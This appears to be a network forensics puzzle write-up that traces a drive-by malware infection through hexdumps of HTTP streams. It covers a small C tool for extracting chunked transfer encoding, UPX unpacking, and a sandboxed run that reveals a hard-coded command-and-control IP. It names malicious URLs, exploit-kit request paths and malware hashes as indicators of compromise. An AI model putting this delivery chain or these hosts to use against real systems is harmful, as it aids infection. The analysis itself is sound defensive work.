000001d0  54 54 50 2f 31 2e 31 20  32 30 30 20 4f 4b 0d 0a  |TTP/1.1 200 OK..|
000001e0  53 65 72 76 65 72 3a 20  6e 67 69 6e 78 0d 0a 44  |Server: nginx..D|
000001f0  61 74 65 3a 20 57 65 64  2c 20 31 37 20 4d 61 72  |ate: Wed, 17 Mar|
00000200  20 32 30 31 30 20 30 30  3a 35 35 3a 33 36 20 47  | 2010 00:55:36 G|
00000210  4d 54 0d 0a 43 6f 6e 74  65 6e 74 2d 54 79 70 65  |MT..Content-Type|
00000220  3a 20 74 65 78 74 2f 68  74 6d 6c 3b 20 63 68 61  |: text/html; cha|
00000230  72 73 65 74 3d 55 54 46  2d 38 0d 0a 54 72 61 6e  |rset=UTF-8..Tran|
00000240  73 66 65 72 2d 45 6e 63  6f 64 69 6e 67 3a 20 63  |sfer-Encoding: c|
00000250  68 75 6e 6b 65 64 0d 0a  43 6f 6e 6e 65 63 74 69  |hunked..Connecti|
00000260  6f 6e 3a 20 6b 65 65 70  2d 61 6c 69 76 65 0d 0a  |on: keep-alive..|
00000270  58 2d 50 6f 77 65 72 65  64 2d 42 79 3a 20 50 48  |X-Powered-By: PH|
00000280  50 2f 35 2e 32 2e 31 31  0d 0a 43 61 63 68 65 2d  |P/5.2.11..Cache-|
00000290  43 6f 6e 74 72 6f 6c 3a  20 6e 6f 2d 73 74 6f 72  |Control: no-stor|
000002a0  65 2c 20 6e 6f 2d 63 61  63 68 65 2c 20 6d 75 73  |e, no-cache, mus|
000002b0  74 2d 72 65 76 61 6c 69  64 61 74 65 0d 0a 45 78  |t-revalidate..Ex|
000002c0  70 69 72 65 73 3a 20 54  68 75 2c 20 30 31 20 4a  |pires: Thu, 01 J|
000002d0  61 6e 20 32 30 30 30 20  30 30 3a 30 30 3a 30 30  |an 2000 00:00:00|
000002e0  20 47 4d 54 0d 0a 4c 61  73 74 2d 4d 6f 64 69 66  | GMT..Last-Modif|
000002f0  69 65 64 3a 20 54 68 75  2c 20 30 31 20 4a 61 6e  |ied: Thu, 01 Jan|
00000300  20 32 30 30 30 20 30 30  3a 30 30 3a 30 30 20 47  | 2000 00:00:00 G|
00000310  4d 54 0d 0a 50 72 61 67  6d 61 3a 20 6e 6f 2d 63  |MT..Pragma: no-c|
00000320  61 63 68 65 0d 0a 43 6f  6e 74 65 6e 74 2d 45 6e  |ache..Content-En|
00000330  63 6f 64 69 6e 67 3a 20  67 7a 69 70 0d 0a 0d 0a  |coding: gzip....|
00000340  34 38 39 0d 0a 1f 8b 08  00 00 00 00 00 00 03 ed  |489.............|
00000350  58 5b 6f db 36 14 7e 0f  d0 ff 20 18 30 18 23 85  |X[o.6.~... .0.#.|
00000360  2d 91 12 e9 9b 3c 04 73  83 3e a4 18 8a 01 6d b6  |-....<.s.>....m.|
00000370  ac 0f b4 44 c7 4e 7c 51  25 da 8e f3 eb 47 9a 92  |...D.N|Q%....G..|
00000380  2b 2a b4 7c 49 52 14 d8  12 98 47 24 cf f5 3b e4  |+*.|IR....G$..;.|
00000390  91 c8 ee 88 4f 27 bd ee  60 1e ae 7b 67 dd 41 2c  |....O'..`..{g.A,|
000003a0  9a 24 88 c7 11 b7 f8 3a  62 3e e0 ec 91 37 ee e9  |.$.....:b>...7..|
000003b0  92 aa 51 60 25 71 e0 83  c7 c7 c7 ba f8 81 5e b7  |..Q`%q........^.|
000003c0  a1 c6 b7 62 bd 33 f1 b7  a4 b1 35 18 24 d4 07 a0  |...b.3....5.$...|
000003d0  73 76 96 8d 7c 49 fe 0c  2f d7 3e a8 a6 83 43 42  |sv..|I../.>...CB|
000003e0  88 cf 47 e3 24 ed 7a 9e                           |..G.$.z.|
000003e8

Reviewing the output from hexdump shows the client's first GET request is for 
a file called "true.php" on a host named "nrtjo.eu".  From this we can 
determine the URL visited was http://nrtjo.eu/true.php.  The server's 
response shows the encoding is gzip beginning at offset 0x345. 

Using "dd" and "gzip" I was able to extract the content from the first 
stream file with the following commands:

$ dd if=C0A81781-1061-3B355B66-80 of=true.php.gz bs=1 skip=837

$ gzip -d true.php.gz 


The decompressed file, true.php, appears to contain heavily obfuscated 
javascript and indicates this page invokes additional client requests 
for content.

Ms. Moneymany visits http://nrtjo.eu/true.php (59.53.91.102 - china telecom)

true.php  - contains obfuscated javascript and requests additional content

GET /xxx.xxx -(contains obfuscated javascript decoder?)
GET /favicon.ico -- 404
GET /q.jar       
GET /sdfj.jar
GET /loading.php?spl=javadnw&J050006010  - (inline exe)
GET //loading.php?spl=javad0             - (inline exe)


After observing this I belive we have the answer to question #3.

===============================================================================

Q3.	 What was the starting URL of this incident? In other words, on which URL 
     did Ms. Moneymany probably click?

A3.  http://nrtjo.eu/true.php

===============================================================================

To find the answer to question #4 I continued examining the stream files with
hexdump and found 2 that returned content containing a reference to "file.exe"

$ hexdump -C -n 512 C0A81781-1066-3B355B66-80 
00000000  47 45 54 20 2f 2f 6c 6f  61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61  76 61 64 6e 77 26 4a 30  |p?spl=javadnw&J0|
00000020  35 30 30 30 36 30 31 30  20 48 54 54 50 2f 31 2e  |50006010 HTTP/1.|
00000030  31 0d 0a 55 73 65 72 2d  41 67 65 6e 74 3a 20 4d  |1..User-Agent: M|
00000040  6f 7a 69 6c 6c 61 2f 34  2e 30 20 28 57 69 6e 64  |ozilla/4.0 (Wind|
00000050  6f 77 73 20 58 50 20 35  2e 31 29 20 4a 61 76 61  |ows XP 5.1) Java|
00000060  2f 31 2e 36 2e 30 5f 30  35 0d 0a 48 6f 73 74 3a  |/1.6.0_05..Host:|
00000070  20 6e 72 74 6a 6f 2e 65  75 0d 0a 41 63 63 65 70  | nrtjo.eu..Accep|
00000080  74 3a 20 74 65 78 74 2f  68 74 6d 6c 2c 20 69 6d  |t: text/html, im|
00000090  61 67 65 2f 67 69 66 2c  20 69 6d 61 67 65 2f 6a  |age/gif, image/j|
000000a0  70 65 67 2c 20 2a 3b 20  71 3d 2e 32 2c 20 2a 2f  |peg, *; q=.2, */|
000000b0  2a 3b 20 71 3d 2e 32 0d  0a 43 6f 6e 6e 65 63 74  |*; q=.2..Connect|
000000c0  69 6f 6e 3a 20 6b 65 65  70 2d 61 6c 69 76 65 0d  |ion: keep-alive.|
000000d0  0a 0d 0a 48 54 54 50 2f  31 2e 31 20 32 30 30 20  |...HTTP/1.1 200 |
000000e0  4f 4b 0d 0a 53 65 72 76  65 72 3a 20 6e 67 69 6e  |OK..Server: ngin|
000000f0  78 0d 0a 44 61 74 65 3a  20 57 65 64 2c 20 31 37  |x..Date: Wed, 17|
00000100  20 4d 61 72 20 32 30 31  30 20 30 30 3a 35 36 3a  | Mar 2010 00:56:|
00000110  30 35 20 47 4d 54 0d 0a  43 6f 6e 74 65 6e 74 2d  |05 GMT..Content-|
00000120  54 79 70 65 3a 20 61 70  70 6c 69 63 61 74 69 6f  |Type: applicatio|
00000130  6e 2f 6f 63 74 65 74 2d  73 74 72 65 61 6d 0d 0a  |n/octet-stream..|
00000140  54 72 61 6e 73 66 65 72  2d 45 6e 63 6f 64 69 6e  |Transfer-Encodin|
00000150  67 3a 20 63 68 75 6e 6b  65 64 0d 0a 43 6f 6e 6e  |g: chunked..Conn|
00000160  65 63 74 69 6f 6e 3a 20  6b 65 65 70 2d 61 6c 69  |ection: keep-ali|
00000170  76 65 0d 0a 58 2d 50 6f  77 65 72 65 64 2d 42 79  |ve..X-Powered-By|
00000180  3a 20 50 48 50 2f 35 2e  32 2e 31 31 0d 0a 43 6f  |: PHP/5.2.11..Co|
00000190  6e 74 65 6e 74 2d 44 69  73 70 6f 73 69 74 69 6f  |ntent-Dispositio|
000001a0  6e 3a 20 69 6e 6c 69 6e  65 3b 20 66 69 6c 65 6e  |n: inline; filen|
000001b0  61 6d 65 3d 66 69 6c 65  2e 65 78 65 0d 0a 0d 0a  |ame=file.exe....|
000001c0  31 65 61 35 0d 0a 4d 5a  90 00 03 00 00 00 04 00  |1ea5..MZ........|
000001d0  00 00 ff ff 00 00 b8 00  00 00 00 00 00 00 40 00  |..............@.|
000001e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

$ hexdump -C -n 512 C0A81781-1067-3B355B66-80 
00000000  47 45 54 20 2f 2f 6c 6f  61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61  76 61 64 30 20 48 54 54  |p?spl=javad0 HTT|
00000020  50 2f 31 2e 31 0d 0a 55  73 65 72 2d 41 67 65 6e  |P/1.1..User-Agen|
00000030  74 3a 20 4d 6f 7a 69 6c  6c 61 2f 34 2e 30 20 28  |t: Mozilla/4.0 (|
00000040  57 69 6e 64 6f 77 73 20  58 50 20 35 2e 31 29 20  |Windows XP 5.1) |
00000050  4a 61 76 61 2f 31 2e 36  2e 30 5f 30 35 0d 0a 48  |Java/1.6.0_05..H|
00000060  6f 73 74 3a 20 6e 72 74  6a 6f 2e 65 75 0d 0a 41  |ost: nrtjo.eu..A|
00000070  63 63 65 70 74 3a 20 74  65 78 74 2f 68 74 6d 6c  |ccept: text/html|
00000080  2c 20 69 6d 61 67 65 2f  67 69 66 2c 20 69 6d 61  |, image/gif, ima|
00000090  67 65 2f 6a 70 65 67 2c  20 2a 3b 20 71 3d 2e 32  |ge/jpeg, *; q=.2|
000000a0  2c 20 2a 2f 2a 3b 20 71  3d 2e 32 0d 0a 43 6f 6e  |, */*; q=.2..Con|
000000b0  6e 65 63 74 69 6f 6e 3a  20 6b 65 65 70 2d 61 6c  |nection: keep-al|
000000c0  69 76 65 0d 0a 0d 0a 48  54 54 50 2f 31 2e 31 20  |ive....HTTP/1.1 |
000000d0  32 30 30 20 4f 4b 0d 0a  53 65 72 76 65 72 3a 20  |200 OK..Server: |
000000e0  6e 67 69 6e 78 0d 0a 44  61 74 65 3a 20 57 65 64  |nginx..Date: Wed|
000000f0  2c 20 31 37 20 4d 61 72  20 32 30 31 30 20 30 30  |, 17 Mar 2010 00|
00000100  3a 35 36 3a 31 30 20 47  4d 54 0d 0a 43 6f 6e 74  |:56:10 GMT..Cont|
00000110  65 6e 74 2d 54 79 70 65  3a 20 61 70 70 6c 69 63  |ent-Type: applic|
00000120  61 74 69 6f 6e 2f 6f 63  74 65 74 2d 73 74 72 65  |ation/octet-stre|
00000130  61 6d 0d 0a 54 72 61 6e  73 66 65 72 2d 45 6e 63  |am..Transfer-Enc|
00000140  6f 64 69 6e 67 3a 20 63  68 75 6e 6b 65 64 0d 0a  |oding: chunked..|
00000150  43 6f 6e 6e 65 63 74 69  6f 6e 3a 20 6b 65 65 70  |Connection: keep|
00000160  2d 61 6c 69 76 65 0d 0a  58 2d 50 6f 77 65 72 65  |-alive..X-Powere|
00000170  64 2d 42 79 3a 20 50 48  50 2f 35 2e 32 2e 31 31  |d-By: PHP/5.2.11|
00000180  0d 0a 43 6f 6e 74 65 6e  74 2d 44 69 73 70 6f 73  |..Content-Dispos|
00000190  69 74 69 6f 6e 3a 20 69  6e 6c 69 6e 65 3b 20 66  |ition: inline; f|
000001a0  69 6c 65 6e 61 6d 65 3d  66 69 6c 65 2e 65 78 65  |ilename=file.exe|
000001b0  0d 0a 0d 0a 31 65 61 35  0d 0a 4d 5a 90 00 03 00  |....1ea5..MZ....|
000001c0  00 00 04 00 00 00 ff ff  00 00 b8 00 00 00 00 00  |................|
000001d0  00 00 40 00 00 00 00 00  00 00 00 00 00 00 00 00  |..@.............|
000001e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000001f0  00 00 00 00 00 00 e8 00  00 00 0e 1f ba 0e 00 b4  |................|

After identifying the stream files containing executable content I wasn't
sure how to extract it.  I reviewed RFC 2616 again to gain a better 
understanding of how "chunked" transfer encoding works.  

I considered using dd to extract the individual chunks and manually splice
them back together but found this to be too tedious.  Instead I wrote a small 
program in C to help whith this task called "xcte" which extracts chunked 
transfer encoding from reassembled TCP stream files.

Here is the code I wrote.  This is highly experimental and lacks error
checking but seemed to get the job done and worked on both stream files.

/*******************************************************************************
*
*  xcte.c - Extract Chunked Transfer-Encoding from TCP stream files
*
*  Copyright (C) 2010 - Christian North
*
*******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define version  "v0.2 BETA"

/******************************************************************************/
void usage()
{
	printf("XCTE %s - ",version);
	printf("Extract Chunked Transfer-Encoding from TCP stream files\n");
	printf("Usage: xcte <file>\n");
	exit(0);
}

/******************************************************************************/
int chunked_encoding(FILE *stream)
{
	const char *encoding="Transfer-Encoding: chunked";
	size_t len=1024;
	char data[len];
	long offset=0;
	int bytes=0;
	int c=0;

	while(!feof(stream)){
		if((bytes=fread(data,1,len,stream)) == 0) break;
		for(c=0;c<(bytes-1);c++){
			if(data[c] == 0x0D && data[c+1] == 0x0A){
				data[c]='\0';	
				offset+=strlen(data)+2;
				break;
			}
		}
		if(strstr(data,encoding) != NULL) {
			rewind(stream);
			return 1;
		}
		fseek(stream,offset,SEEK_SET);
	}

	return 0;
}

/******************************************************************************/
FILE *disposition(char *data)
{
	const char *disposition = "Content-Disposition";
	const char *filename = "filename=";
	FILE *fp = NULL;

	if(strstr(data,disposition) != NULL) {
		filename=strtok(data,"=");
		printf("Extracting Content: ");
		printf("%s\n",data+strlen(filename)+1);
		fp=fopen(data+strlen(filename)+1,"a");
		return fp;
	}

	return NULL;
}

/******************************************************************************/
int extract(FILE *stream, FILE *content)
{
	size_t chunk=0;
	size_t len=8;
	char *fragment;
	char data[len];
	char hex[len];

	while(!feof(stream)){
		if(fread(data,1,len,stream) == 0) break;
		snprintf(hex,len,"%c%c%c%c",data[2],data[3],data[4],data[5]);
		chunk=strtoul(hex,NULL,16);
		if((fragment = malloc(chunk)) == NULL) break;
		if(fread(fragment,1,chunk,stream) == 0) break;
		fwrite(fragment,1,chunk,content);
		free(fragment);
	}

	fclose(content);
	return 0;
}

/******************************************************************************/
int main(int argc, char **argv)
{
	char *streamfile=NULL;
	FILE *stream=NULL;
	FILE *content=NULL;
	size_t len=1024;
	char data[len];
	long offset=0;
	int bytes=0;
	int c=0;

	if(argc != 2) usage();
	streamfile = argv[1];
	if((stream = fopen(streamfile,"r")) == NULL) usage();

	if(!chunked_encoding(stream)){
		printf("Transfer-Encoding: chunked - not found in ");
		printf("\"%s\"\n", streamfile);	
		exit(0);
	}

	while(!feof(stream)){
		if((bytes=fread(data,1,len,stream)) == 0) break;
		for(c=0;c<(bytes-1);c++){
			if(data[c] == 0x0D && data[c+1] == 0x0A) {
				data[c]='\0';	
				offset++;
				break;
			}
			offset++;
		}
		content = disposition(data);
		if(content != NULL) break;
		fseek(stream,offset,SEEK_SET);
	}

	offset--;
	fseek(stream,offset,SEEK_SET);

	while(!feof(stream)){
		if((bytes=fread(data,1,len,stream)) == 0) break;
		for(c=0;c<(bytes-4);c++){
			if(data[c]   == 0x0D && data[c+1] == 0x0A &&
			   data[c+2] == 0x0D && data[c+3] == 0x0A ){
				offset+=2; 
				fseek(stream,offset,SEEK_SET);
				extract(stream,content);
				fclose(stream);
				break;
			}
			offset++;
		}
	}

	return 0;
}
/******************************************************************************/


After compiling this with "gcc -o xcte xcte.c" I was able to extract the 
executables contained in both stream files that had references to "file.exe"

$ gcc -o xcte xcte.c

$ ./xcte C0A81781-1066-3B355B66-80
Extracting Content: file.exe

$ file file.exe
file.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

$ md5sum file.exe
5942ba36cf732097479c51986eee91ed  file.exe

$ rm file.exe

$ ./xcte C0A81781-1067-3B355B66-80
Extracting Content: file.exe

$ file file.exe
file.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

$ md5sum file.exe
5942ba36cf732097479c51986eee91ed  file.exe


The tail end of the checksum matches the hint for question #4.


===============================================================================

Q4.  As part of the infection, a malicious Windows executable file was 
     downloaded onto Ms. Moneymany’s system. What was the file’s MD5 hash? 
     Hint: It ends on -Y΄91ed‘.

A4.  5942ba36cf732097479c51986eee91ed

===============================================================================

Unfortunatelly I don't have a lot of experience with malware or packers so I 
turned to google and found a list of candidates.

Using hexdump against the executable file suggested the packer was UPX.

$ hexdump -C -n 1024 file.exe 
00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 e8 00 00 00  |................|
00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
00000080  2b 97 33 0a 6f f6 5d 59  6f f6 5d 59 6f f6 5d 59  |+.3.o.]Yo.]Yo.]Y|
00000090  ac f9 00 59 67 f6 5d 59  48 30 30 59 6d f6 5d 59  |...Yg.]YH00Ym.]Y|
000000a0  6f f6 5c 59 2c f6 5d 59  36 d5 4e 59 6c f6 5d 59  |o.\Y,.]Y6.NYl.]Y|
000000b0  48 30 33 59 67 f6 5d 59  48 30 27 59 6e f6 5d 59  |H03Yg.]YH0'Yn.]Y|
000000c0  48 30 21 59 6e f6 5d 59  48 30 25 59 6e f6 5d 59  |H0!Yn.]YH0%Yn.]Y|
000000d0  52 69 63 68 6f f6 5d 59  00 00 00 00 00 00 00 00  |Richo.]Y........|
000000e0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 03 00  |........PE..L...|
000000f0  96 25 99 4b 00 00 00 00  00 00 00 00 e0 00 03 01  |.%.K............|
00000100  0b 01 08 00 00 10 01 00  00 10 00 00 00 80 00 00  |................|
00000110  30 8f 01 00 00 90 00 00  00 a0 01 00 00 00 40 00  |0.............@.|
00000120  00 10 00 00 00 02 00 00  04 00 00 00 00 00 00 00  |................|
00000130  04 00 00 00 00 00 00 00  00 b0 01 00 00 10 00 00  |................|
00000140  00 00 00 00 02 00 00 04  00 00 10 00 00 10 00 00  |................|
00000150  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
00000160  c4 a2 01 00 78 00 00 00  84 a1 01 00 40 01 00 00  |....x.......@...|
00000170  00 a0 01 00 84 01 00 00  00 00 00 00 00 00 00 00  |................|
00000180  00 00 00 00 00 00 00 00  3c a3 01 00 0c 00 00 00  |........<.......|
00000190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000001e0  55 50 58 30 00 00 00 00  00 80 00 00 00 10 00 00  |UPX0............|
000001f0  00 00 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
00000200  00 00 00 00 80 00 00 e0  55 50 58 31 00 00 00 00  |........UPX1....|
00000210  00 10 01 00 00 90 00 00  00 02 01 00 00 04 00 00  |................|
00000220  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 e0  |............@...|
00000230  2e 72 73 72 63 00 00 00  00 10 00 00 00 a0 01 00  |.rsrc...........|
00000240  00 04 00 00 00 06 01 00  00 00 00 00 00 00 00 00  |................|
00000250  00 00 00 00 40 00 00 c0  00 00 00 00 00 00 00 00  |....@...........|
00000260  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000003d0  00 00 00 00 00 00 00 00  00 00 00 33 2e 30 34 00  |...........3.04.|
000003e0  55 50 58 21 0d 09 02 0a  48 ae 9d 34 9e c6 c6 02  |UPX!....H..4....|
000003f0  04 65 01 00 27 ff 00 00  00 42 01 00 26 02 00 2e  |.e..'....B..&...|
00000400


===============================================================================

Q5.  What is the name of the packer used to protect the malicious Windows 
     executable? Hint: This is one of the most popular freely-available packers 
     seen in ΄mainstream‘ malware.

A5.  UPX

===============================================================================

To answer question #6 I downloaded a copy of UPX and used it to decompress the 
executable "file.exe."

$ upx -d file.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2009
UPX 3.04        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 27th 2009

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     82432 <-     68096   82.61%    win32/pe     file.exe

Unpacked 1 file.


$ md5sum file.exe
0f37839f48f7fc77e6d50e14657fb96e  file.exe


===============================================================================

Q6.  What is the MD5 hash of the unpacked version of the malicious Windows 
     executable file?

A6.  0f37839f48f7fc77e6d50e14657fb96e

===============================================================================

To find the last answer I needed to infect a Windows XP host and monitor where 
it tries to connect on the Internet.  VMWare proved to be an excellent tool
for this task.

I have an ESX server in my home lab that I used to create a new resource 
pool called "forensics".  In this resource pool I created 2 virtual machines.
One running linux with a Apache and a copy of my IP traffic analyzer. The other 
running Windows XP.  These systems where isoloated from the Internet but 
connected to each other.  The Linux host was configured as the gateway for the
Windows system. Next I placed a copy of file.exe in the the default web root 
of the Linux server running Apache. On the Windows host I downloaded 
file.exe from the Linux server using a web browser.  Then I started my IP 
traffic analyzer on the Linux host to monitor all network communications from 
the Windows host.  On the Windows host I opened "file.exe" and monitored the 
output of the traffic analyzer on the Linux machine.  Immediately a connection 
attempt was made to 213.155.29.144 on TCP/444.

===============================================================================

Q7   The malicious executable attempts to connect to an Internet host using an 
     IP address which is hard-coded into it (there was no DNS lookup). What is 
     the IP address of that Internet host?

A7.  213.155.29.144

===============================================================================

This was a great puzzle!

I had fun honing my forensic skills and learned a lot in the process.   :)